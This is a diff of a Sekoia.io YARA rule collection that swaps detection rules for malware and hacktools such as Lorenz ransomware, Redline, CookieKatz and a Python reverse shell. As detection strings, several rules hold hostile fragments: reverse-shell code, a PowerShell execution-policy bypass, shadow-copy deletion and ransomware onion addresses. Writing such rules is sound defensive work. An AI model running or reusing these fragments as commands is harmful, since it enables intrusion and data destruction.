-rule SEKOIA_Backdoor_Win_Foresttiger : FILE
+rule SEKOIA_Apt_Luckymouse_Compromised_Electronapp : FILE
 {
 	meta:
-		description = "Detect Lazarus' malware ForestTiger"
+		description = "Detects compromised ElectronApp"
 		author = "Sekoia.io"
-		id = "d3128da2-a86d-4db8-9b75-2f3048831c7e"
-		date = "2023-10-24"
+		id = "7702217d-771f-47af-8eaa-d5acf1e14f4d"
+		date = "2022-08-05"
 		modified = "2024-12-19"
-		reference = "https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_foresttiger.yar#L1-L21"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_luckymouse_compromised_electronapp.yar#L1-L15"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "401adaad1597c017c976c5b0b8f67851469c95758779b7691ebb037d0dda9f38"
+		logic_hash = "939546b75d5f7161bb8eb1fd838a9a7c0c88cb58a0f01f67e687523e5b31b0aa"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "e06f29dccfe90ae80812c2357171b5c48fba189ae103d28e972067b107e58795"
-		hash2 = "0be1908566efb9d23a98797884f2827de040e4cedb642b60ed66e208715ed4aa"
 
 	strings:
-		$ = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.42"
-		$ = "biwbih="
-		$ = "rlzbiw="
-		$ = "whoami EnDePriv Erro" wide
+		$s = "module.exports=function(t){eval(function(p,a,c,k,e,r)"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		$s at 0 and filesize < 100KB
 }
-rule SEKOIA_Tool_Sharphoundexecutable_Strings : FILE
+rule SEKOIA_Hacktool_Ntospy_Strings : FILE
 {
 	meta:
-		description = "Detects the SharpHound tool"
+		description = "Detects Ntospy based on strings"
 		author = "Sekoia.io"
-		id = "2cf8046e-5b4d-4ff7-b4b2-7aaeaf58883b"
-		date = "2022-08-11"
+		id = "c3281666-6a31-4718-a9c0-82944c6fdcb0"
+		date = "2023-12-05"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_sharphoundexecutable_strings.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_ntospy_strings.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "1b28a2b9dd594f344a1a2a74fd9b30527a66dabb451b21afca40a0e6ec8d3553"
+		logic_hash = "e5bd963419e515d65a03592051822fd801f4a21d54cdb18d408556c4bfef78f5"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249497,50 +249506,51 @@ rule SEKOIA_Tool_Sharphoundexecutable_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "BloodHoundLoopResults.zip" wide
-		$ = "[-] Removed PSRemote Collection" wide
-		$ = "Initializing SharpHound at {time} on {date}" wide
-		$ = "[SearchForest] Cross-domain enumeration may result in reduced data quality" wide
-		$ = "SharpHound Enumeration Completed at {Time} on {Date}! Happy Graphing!" wide
-		$ = "Consumer task on thread {id} completed" wide
+		$ = "NPGetCaps"
+		$ = "NPLogonNotify"
+		$ = {43 00 3A 00 5C 00 [10-150] 00 2E 00 6D 00 73 00 75}
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 300KB and all of them
 }
-
-rule SEKOIA_Latrodectus_Exports : FILE
+rule SEKOIA_Apt_Andariel_Keylogger_Strings : FILE
 {
 	meta:
-		description = "detection based on the exports"
+		description = "Detects one of the Andariel keylogger"
 		author = "Sekoia.io"
-		id = "29076cf5-f391-42f2-918f-e1c929bd368d"
-		date = "2024-07-03"
+		id = "59e94bee-9bd4-4f72-9358-858956bb4787"
+		date = "2024-06-17"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/latrodectus_exports.yar#L3-L15"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_andariel_keylogger_strings.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "01385f31b1f2fc94453a2ead136a1f7fb253a72bee95f74d755acfa97abdb26d"
+		logic_hash = "671698af4fbaed3d19f3d3498263183909db9422a5a0a8f12ba119409773c505"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$ = "Username:%s [%d/%02d/%02d %02d:%02d]" ascii fullword
+		$ = "-------[%d/%02d/%02d %02d:%02d]"
+		$ = "{Insert}"
+
 	condition:
-		(pe.exports ( "stow" ) or pe.exports ( "homq" ) or pe.exports ( "scub" ) ) and pe.number_of_exports >= 3 and uint16( 0 ) == 0x5a4d
+		uint16be( 0 ) == 0x4d5a and filesize < 300KB and 2 of them
 }
-rule SEKOIA_Hacktool_Nbtscan_Strings : FILE
+rule SEKOIA_Tool_Safetykatz : FILE
 {
 	meta:
-		description = "Detects NBTScan hacktool based on strings, ELF & PE variants"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "8883b56c-a085-459c-9ec6-a139ad5a2671"
-		date = "2022-02-06"
+		id = "90f93244-38a7-4574-87c6-15d494e9173b"
+		date = "2023-06-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_nbtscan_strings.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_safetykatz.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "87e4f5dd16ee29dfd23b70dccbc41b0ef40c2db28f42fbd7fd84e5e93ca5c943"
+		logic_hash = "f443dd5be1e15f8385427d965f8c8476c5f1b57b7c9ab53d9e13eb47735e09d3"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249548,140 +249558,107 @@ rule SEKOIA_Hacktool_Nbtscan_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "CHT:nfp:bt:vw:mVO:1P"
-		$ = "usage: %s [options] target [targets...]"
-		$ = "Targets are lists of IP addresses, DNS names, or address"
-		$ = "net bits [%d] must be 1..32"
-		$ = "subnet /%d is too large (%d max)"
-		$ = "[%s] is invalid IP address"
-		$ = "[%s] is an invalid target (bad IP/hostname)"
+		$s1 = "SafetyKatz" ascii fullword
+		$s2 = "get_mimikatz" ascii fullword
+		$s3 = "$8347e81b-89fc-42a9-b22c-f59a6a572dec" ascii fullword
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 5 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and all of them
 }
-rule SEKOIA_Suspicious_Users_Dev : FILE
+rule SEKOIA_Tool_Generic_Python_Reverse_Shell_Strings : FILE
 {
 	meta:
-		description = "Nirscord stealer"
+		description = "Detects reverse shell"
 		author = "Sekoia.io"
-		id = "9e8af456-6f84-4922-a262-20b8f5c8a1eb"
-		date = "2022-12-22"
+		id = "5b926d15-4f21-428c-a9fa-ee085a98d42b"
+		date = "2024-04-16"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/suspicious_users_dev.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_generic_python_reverse_shell_strings.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "6084b319efb7b4137517c63dd2ed1023a4b25513b7ac50e95154bbac0fea0af7"
-		score = 65
+		logic_hash = "bb4fcef595f4be035815f536786987ac1343727f16c0560a1cb593e854ba8f17"
+		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$user1 = "\\Users\\raghus1\\" ascii
-		$user2 = "\\Users\\drill\\" ascii
-		$key = {58 69 b3 5f b3 87 74 f6 65 eb 96 e7 6f 4d 16 83 }
+		$ = "import sys,socket,os,pty;"
+		$ = "[os.dup2(s.fileno(),fd) for fd in (0,1,2)]"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 6MB and 1 of ( $user* ) and $key
+		all of them and filesize < 1000
 }
-rule SEKOIA_Infostealer_Win_Redline_Strings : FILE
+rule SEKOIA_Rat_Win_Reverserat
 {
 	meta:
-		description = "Finds Redline samples based on characteristic strings"
+		description = "Detect SideCopy's ReverseRAT v3 observed in January 2023"
 		author = "Sekoia.io"
-		id = "0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e"
-		date = "2022-09-07"
+		id = "8fbd395f-f44e-46d5-a942-7c7e88f37127"
+		date = "2023-02-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_redline_strings.yar#L1-L47"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_reverserat.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "44443e16b788231b3f256b4d1e91c458c33963d5737d69fc5850f6b0efa7726b"
+		hash = "b277a824b2671f40298ce03586a2ccc0fca2a081a66230c57a3060c2028f13ee"
+		hash = "8b87459483248d7b95424cd52b7d4f3031e89c6644adc2e167556e071d9ec3aa"
+		logic_hash = "13a5a916e084996ce4d7840581250f7630652acdcad0f66e21763cb3a9cbccc3"
 		score = 75
-		quality = 78
-		tags = "FILE"
+		quality = 80
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$gen01 = "ChromeGetRoamingName" ascii
-		$gen02 = "ChromeGetLocalName" ascii
-		$gen03 = "get_UserDomainName" ascii
-		$gen04 = "get_encrypted_key" ascii
-		$gen05 = "browserPaths" ascii
-		$gen06 = "GetBrowsers" ascii
-		$gen07 = "get_InstalledInputLanguages" ascii
-		$gen08 = "BCRYPT_INIT_AUTH_MODE_INFO_VERSION" ascii
-		$spe0 = "Profile_encrypted_value" wide
-		$spe1 = "[AString-ZaString-z\\d]{2String4}\\.[String\\w-]{String6}\\.[\\wString-]{2String7}" wide
-		$spe2 = "AFileSystemntivFileSystemirusPrFileSystemoduFileSystemct|AntiFileSystemSpyWFileSystemareProFileSystemduct|FireFileSystemwallProdFileSystemuct" wide
-		$spe3 = "OpHandlerenVPHandlerN ConHandlernect%DSK_23%Opera GXcookies" wide
-		$spe4 = "//settinString.Removeg[@name=\\PasswString.Removeord\\]/valuString.RemoveeROOT\\SecurityCenter" wide
-		$spe5 = "ROOT\\SecurityCenter2Web DataSteamPath" wide
-		$spe6 = "windows-1251, CommandLine:" wide
-		$spe7 = "OFileInfopeFileInfora GFileInfoX StabFileInfole" wide
-		$spe8 = "ApGenericpDaGenericta\\RGenericoamiGenericng\\" wide
-		$spe9 = "*wallet*" wide
-		$typ01 = "359A00EF6C789FD4C18644F56C5D3F97453FFF20" ascii
-		$typ02 = "F413CEA9BAA458730567FE47F57CC3C94DDF63C0" ascii
-		$typ03 = "A937C899247696B6565665BE3BD09607F49A2042" ascii
-		$typ04 = "D67333042BFFC20116BF01BC556566EC76C6F7E2" ascii
-		$typ05 = "4E3D7F188A5F5102BEC5B820632BBAEC26839E63" ascii
-		$typ06 = "FB10FF1AD09FE8F5CA3A85B06BC96596AF83B350" ascii
-		$typ07 = "77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60" ascii
-		$typ08 = "A8F9B62160DF085B926D5ED70E2B0F6C95A25280" ascii
-		$typ09 = "718D1294A5C2D3F3D70E09F2F473155C4F567201" ascii
-		$typ10 = "2FBDC611D3D91C142C969071EA8A7D3D10FF6301" ascii
-		$typ11 = "2A19BFD7333718195216588A698752C517111B02" ascii
-		$typ12 = "EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2" ascii
-		$typ13 = "04EC68A0FC7D9B6A255684F330C28A4DCAB91F13" ascii
+		$ = "SELECT maxclockspeed,  datawidth, name, manufacturer FROM Win32_Processor" wide
+		$ = "select * from Win32_PhysicalMemory" wide
+		$ = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 7 of ( $gen* ) or 3 of ( $spe* ) or 2 of ( $typ* ) )
+		all of them
 }
-rule SEKOIA_Rat_Win_Tutclient : FILE
+rule SEKOIA_Crypter_Vbs_To_Exe
 {
 	meta:
-		description = "Detect the open-source RAT TutClient"
+		description = "first stage of Crypter-VBS-to-EXE dropped on infected hosted"
 		author = "Sekoia.io"
-		id = "2bd2d61f-3654-4acd-9773-8d3617c67ee0"
-		date = "2024-02-09"
+		id = "33ed286f-3055-452e-952b-abaf11a543a1"
+		date = "2023-01-03"
 		modified = "2024-12-19"
-		reference = "https://github.com/AdvancedHacker101/C-Sharp-R.A.T-Client"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_tutclient.yar#L1-L21"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/crypter_vbs_to_exe.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f780948ab03dd0cd64d023367186a88c9eaa566170142e34aaa08788d9a684eb"
+		logic_hash = "4b3a411de3f36a7f9a310e1b789988c3d9d53eb195d04b374bdf1e5b4157b1e9"
 		score = 75
-		quality = 80
-		tags = "FILE"
+		quality = 55
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Clipboard Data Not Retrived!" wide
-		$ = "Remote Cmd stream reading failed!" wide
-		$ = "PasswordFox" wide
-		$ = "[Right Click, Position: x = <rtd.xpos>; y = <rtd.ypos>]" wide
-		$ = "SendCommand"
-		$ = "HandleCommand"
+		$theDot = ":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" ascii
+		$s1 = "cmd.exe /c curl" ascii
+		$s2 = "WScript.Sleep(3000)" ascii
+		$s3 = "runCmd = \"cmd.exe /c powershell.exe -exec Bypass -C \" + myVar +" ascii
+		$s4 = "WshShell.Run \"cmd /c \" & runCmd, 0, True" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		#theDot> 200 and all of ( $s* )
 }
-rule SEKOIA_Apt_Aptk47_Asyncshell : FILE
+rule SEKOIA_Hacktool_Win_Cookiekatz : FILE
 {
 	meta:
-		description = "Detects APT-K-47's Asyncshell"
+		description = "Finds ChromeKatz (CookieKatz version) standalone samples based on the strings"
 		author = "Sekoia.io"
-		id = "2d009cf4-e30e-406d-8860-03b37a396ffa"
-		date = "2024-11-22"
+		id = "a32769bb-4ec4-46c7-9402-21afdf8d4293"
+		date = "2024-10-30"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_aptk47_asyncshell.yar#L1-L24"
+		reference = "https://github.com/Meckazin/ChromeKatz"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_win_cookiekatz.yar#L1-L36"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "ce6a589d5e3604112e5595a1f8d53e1e"
-		hash = "751f427da8e11d8ab394574260735220"
-		logic_hash = "ac202f7dc317d17118badf71c32776c5666eea4a47e1b439a287b6b8766e9da6"
+		hash = "fef9fc33a788489af44b2f732c450d4ef018fbaced7f5471230b282dfd6f1169"
+		logic_hash = "a030f551d0f3dedf0f19e22b415aa87dd1c43ab2242db8b5cad14ae6b7695b3a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249689,93 +249666,102 @@ rule SEKOIA_Apt_Aptk47_Asyncshell : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Error executing command:" wide
-		$ = "Error occurred:" wide
-		$ = "Attempting to reconnect in {0} seconds..." wide
-		$ = "Exiting the application." wide
-		$ = "Server disconnected." wide
-		$ = "_CorExeMain"
+		$str01 = "CookieKatz.exe" ascii
+		$str02 = "--utility-sub-type=network.mojom.NetworkService" wide
+		$str03 = "chrome.dll" wide
+		$str04 = "msedge.dll" wide
+		$str05 = "msedgewebview2.exe" wide
+		$str06 = "Failed to read cookie struct" wide
+		$str07 = "Failed to read the root node from given address" wide
+		$str08 = "Error reading left node" wide
+		$str09 = "By Meckazin" ascii
+		$str10 = "By default targets first available Chrome process" ascii
+		$str11 = "Kittens love cookies too!" ascii
+		$str12 = "Attempting to read the cookie value from address: 0x%p" ascii
+		$str13 = "szCookieMonster" ascii
+		$str14 = "[*] Targeting Chrome" ascii
+		$str15 = "[*] Targeting Edge" ascii
+		$str16 = "[*] This Cookie map was empty" ascii
+		$str17 = "[+] Found browser process: %d" ascii wide
+		$str18 = "[*] Targeting process PID: %d" wide
+		$str19 = "[*] Found CookieMonster on 0x%p" wide
+		$str20 = "[*] CookieMap should be found in address 0x%p" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
+		uint16( 0 ) == 0x5A4D and 8 of them
 }
-rule SEKOIA_Apt_Oilrig_Odagent_Strings : FILE
+rule SEKOIA_Ransomware_Win_Lorenz : FILE
 {
 	meta:
-		description = "Detects ODAgent malware based on strings"
+		description = "Detect the Lorenz ransomware"
 		author = "Sekoia.io"
-		id = "1c5c0eb5-7c6f-4a34-b2e2-4a7c6d7030d6"
-		date = "2023-12-20"
+		id = "6936cc61-efe5-4d13-b76f-e808ab331457"
+		date = "2022-02-10"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_oilrig_odagent_strings.yar#L1-L21"
+		reference = "https://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_lorenz.yar#L1-L27"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "14a1399ff3519632e3bbb6eea0d44e9908cfc03728bd26f610ab75fff6a8d2c6"
+		logic_hash = "355de0f172c9e877bbca7f75c0bfb07d83ae7f43e7674a7f84c4e4d519dfa7c0"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		version = "1.0"
+		version = "1.1"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "application/x-www-form-urlencoded" ascii wide
-		$ = "dly>" ascii wide
-		$ = "DELETE" ascii wide
-		$ = "nok!" ascii wide
-		$ = ".c:/content" ascii wide
+		$s1 = ".onion" ascii
+		$s2 = "---===Lorenz. Welcome. Again. ===--" ascii
+		$s3 = ".Lorenz.sz40" ascii
+		$url1 = "egypghtljedbs3x3ui45tfhosakzb376epl7baq2ruzfyewcypswhgqd.onion" ascii
+		$url2 = "lorenzmlwpzgxq736jzseuterytjueszsvznuibanxomlpkyxk6ksoyd.onion" ascii
+		$url3 = "vsoonropylvbfqnq2urk7uhaxn7afiwgldnj3ntc743awigojm4p7lid.onion" ascii
+		$url4 = "kpb3ss3vwvfejd4g3gvpvqo6ad7nnmvcqoik4mxt2376yu2adlg5fwyd.onion" ascii
+		$url5 = "vldkrmiqriwlgm2wuxg42nvc6kqsdzsdhsybn27hyn34d66465fxz7id.onion" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 5MB and all of them
+		uint16( 0 ) == 0x5a4d and filesize > 900KB and filesize < 1200KB and ( all of ( $s* ) or 1 of ( $url* ) )
 }
-
-rule SEKOIA_Wiper_Win_Nominatus_Toxicbattery : FILE
+rule SEKOIA_Darkriver_Encodedurl : FILE
 {
 	meta:
-		description = "Detect the Nominatus_ToxicBattery malware"
+		description = "Detects encoding URL inside docx documents"
 		author = "Sekoia.io"
-		id = "0262378f-f509-4ea4-a3eb-cd0183c4361d"
-		date = "2022-11-21"
+		id = "60f1676f-dade-4376-9980-f510dff52ae5"
+		date = "2023-10-10"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/wiper_win_nominatus_toxicbattery.yar#L4-L42"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/darkriver_encodedurl.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "c226a4c3bcc451482eb782c1cb84f3e956be1e214368d1b315076078d3148955"
+		logic_hash = "9477ec39cc1d4cfad676d071748e7e1918a3996b342663cb0a01658846bbf9f5"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "5c9551388213f54c4b54cd42ccb034d8d9173a4bbfcf8b666e0db8df929762e7"
+		hash1 = "13de9f39b1ad232e704b5e0b5051800fcd844e9f661185ace8287a23e9b3868e"
+		hash1 = "3b05e89ff2338472cc493d59bae450338effd29f0ed7d46fb999709e63cf2472"
 
 	strings:
-		$ = "DISK"
-		$ = "FileNaME"
-		$ = "FILNAME"
-		$ = "runCommand"
-		$ = "HAHAH"
-		$ = "Damage"
-		$ = "fastInfector"
-		$ = "d:\\again\\SharpDevelop Projects\\RInjector\\Virus.win32RozbehStrike\\obj\\Debug\\Nominatus_ToxicBattery.pdb"
-		$ = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
-		$ = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" wide
-		$ = "\\Antivirus.bat" wide
-		$ = "\\Antivirus3.vbs" wide
-		$ = "vssadmin Delete Shadows /all /quiet" wide
+		$s1 = "&#109;&#104;&#116;&#109;&#108;&#58;&#104;&#116;&#116;&#112;"
+		$s2 = "&#38;&#95;&#116;&#115;&#61;"
+		$header = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 10 of them or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "e7f35c173c34b7080d437a90ec90a982" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "2e25c5d3baba182f008a5a15c6f06403" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "70b1c002e4c0c9782c7ce1ef4a13c58ec1da54a26fd06dd7821a71f29431da82" )
+		filesize < 500KB and any of ( $s* ) and $header at 0
 }
-rule SEKOIA_Crimeware_Njrat_Strings : FILE
+rule SEKOIA_Rat_Win_Tutclient : FILE
 {
 	meta:
-		description = "Detects njRAT based on some strings"
+		description = "Detect the open-source RAT TutClient"
 		author = "Sekoia.io"
-		id = "215807ae-fbcb-478d-8941-e0787b883669"
-		date = "2022-08-22"
+		id = "2bd2d61f-3654-4acd-9773-8d3617c67ee0"
+		date = "2024-02-09"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/crimeware_njrat_strings.yar#L1-L24"
+		reference = "https://github.com/AdvancedHacker101/C-Sharp-R.A.T-Client"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_tutclient.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "47102adde81682c3c1c856c3495c6f98a9e39aa052eac2ab0a803dab44d19c26"
+		logic_hash = "f780948ab03dd0cd64d023367186a88c9eaa566170142e34aaa08788d9a684eb"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249783,54 +249769,59 @@ rule SEKOIA_Crimeware_Njrat_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "set cdaudio door closed" wide
-		$ = "set cdaudio door open" wide
-		$ = "ping 0" wide
-		$ = "[endof]" wide
-		$ = "TiGeR-Firewall" wide
-		$ = "NetSnifferCs" wide
-		$ = "IPBlocker" wide
-		$ = "Sandboxie Control" wide
+		$ = "Clipboard Data Not Retrived!" wide
+		$ = "Remote Cmd stream reading failed!" wide
+		$ = "PasswordFox" wide
+		$ = "[Right Click, Position: x = <rtd.xpos>; y = <rtd.ypos>]" wide
+		$ = "SendCommand"
+		$ = "HandleCommand"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 5 of them
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-
-rule SEKOIA_Backdoor_Win_Mgbot_Main
+rule SEKOIA_Rat_Win_Konni_Rat : FILE
 {
 	meta:
-		description = "Detect MgBot main.dll file"
+		description = "Detect the KONNI RAT DLL files (x32 and x64)"
 		author = "Sekoia.io"
-		id = "528baa11-58d5-470a-bd6d-963d4ac75d97"
-		date = "2024-03-20"
+		id = "032f1c79-6f03-4588-a4af-38b1f3ca1cb8"
+		date = "2023-09-26"
 		modified = "2024-12-19"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt-attacks-telecoms-africa-mgbot"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_mgbot_main.yar#L4-L35"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_konni_rat.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "61b335c88ce8bc56396b597c7c6f27b1d431941682401f0b3950c80edf7d8403"
+		logic_hash = "764e75d3e433a8784e826f436896c50c9622129412ff277b55ec9aaf1402ff5e"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "706c9030c2fa5eb758fa2113df3a7e79257808b3e79e46869d1bf279ed488c36"
-		hash2 = "017187a1b6d58c69d90d81055db031f1a7569a3b95743679b21e44ea82cfb6c7"
+
+	strings:
+		$ = ".cab" wide
+		$ = ".zip" wide
+		$ = ".rar" wide
+		$ = ".ini" wide
+		$ = ".dat" wide
+		$ = "%s(%d)" wide
+		$ = "%s %s \"%s\"" wide
+		$ = "\\Temp\\" wide
 
 	condition:
